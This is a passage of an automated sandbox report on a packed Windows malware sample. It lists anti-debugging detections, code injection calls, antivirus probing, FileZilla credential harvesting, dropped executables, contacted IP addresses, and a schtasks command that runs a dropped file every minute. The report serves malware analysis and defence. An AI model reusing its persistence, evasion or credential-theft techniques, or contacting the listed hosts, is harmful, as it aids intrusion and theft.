InternetReadFile Sept. 6, 2023, 2:05 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $z?d>^ Q>^ Q>^ Q Q&^ Q Q^ Q Q¹^ QqQ5^ Q>^Q@^ Q Q?^ Q Q?^ Q Q?^ QRich>^ QPEL¬5µcà <AâKPA@PCAEì>Ax@@àDZD B@ø:@Ü.text:A<A `.datadèþPA"@A@À.rsrcàD@@FbA@@.reloc°B²¨C@B4EAþDAEA AA°AAÈAAÜAAúAABA BA<BANBA^BArBABA¦BAÀBAÖBAèBAúBACA"CA@CARCAbCAAACACA²CA¾CAÊCAÞCAøCADA"DA<DAPDA JAúIAäIAÔIAÂIAAARAA`AArCA@AA®IApEAEAEA´EAÊEAÒEAîEAFAFA6FAFFARFAfFAFA FA´FAÆFAØFAäFAðFAGAGA"GA.GA<GAJGAXGAlGAzGAGAGAGA´GAÆGAÔGAàGAðGAHA HA8HARHAdHArHAHAHA²HAÌHAÞHAêHAôHAIAIA.IADIATIA\|IAIAIAvDAÜDAÎDA¸DA¦DADADAREAç0ý01Û0ä@Ã@Uç@6&APZAêu@Áð@ÚA1Ä@~ZÏd2X;X/bad allocationÿÿÿÿB@]D@ z@è=@5I@¸;@6q@CÌ>@¾E@¶E@\|>@F@¶E@<@s@¶E@string too longinvalid string positionT<@\z@ z@Unknown exceptionh<@}z@ z@ð?ð?33ð¿0Cÿ´<@Ó@csmà LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLÀ@@´@XWnA¨@XWà@@XW¨A@XWPA@XWA !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~_.,._;==; ((((( H h(((( H H ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ !"#$%&'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNO request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x006b2a00', u'virtual_address': u'0x006d9000', u'entropy': 7.932190989163723, u'name': u'.vmp2', u'virtual_size': u'0x006b28c4'}

entropy

7.93219098916

description

A section with a high entropy has been found

entropy

0.904397705545

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 6, 2023, 2:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2023, 2:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 6, 2023, 2:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (2 events)

process	www14_n.exe
process	roxaidheyogeyiglyehldxte.exe

Yara rule detected in process memory (10 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 117 events)

Time & API	Arguments	Status
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: AddressBook base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Connection Manager base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: DirectDrawEx base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: EditPlus base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: ENTERPRISE base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Fontcore base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Google Chrome base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IE40 base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IE4Data base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IE5BAKEX base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IEData base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: MobileOptionPack base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: SchedulingAgent base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: WIC base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000003d8 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000350 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: AddressBook base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Connection Manager base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: EditPlus base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: ENTERPRISE base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Fontcore base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Google Chrome base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IE40 base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 6, 2023, 2:04 p.m.	regkey_r: IE4Data base_handle: 0x00000350 key_handle: 0x00000354 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

The executable is likely packed with VMProtect (3 events)

section	.vmp0	description	Section name indicates VMProtect
section	.vmp1	description	Section name indicates VMProtect
section	.vmp2	description	Section name indicates VMProtect

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 0c912b13a1c82db75810fb98a197d7b3ecbdace7

Communicates with host for which no DNS query was performed (8 events)

host	185.225.74.51
host	176.123.9.85
host	185.225.73.32
host	193.42.32.118
host	208.67.104.60
host	45.15.156.229
host	45.9.74.80
host	94.142.138.131

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 6, 2023, 2:04 p.m.	process_identifier: 1140 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Installs itself for autorun at Windows startup (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

Drops a binary and executes it (12 events)

file	C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe
file	C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe
file	C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe
file	C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe
file	C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe
file	C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe
file	C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe
file	C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe
file	C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe
file	C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe
file	C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe
file	C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 6, 2023, 2:04 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1140 process_handle: 0x00000074	1	1	0

Collects information about installed applications (50 out of 81 events)

Time & API	Arguments	Status
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2023, 2:04 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
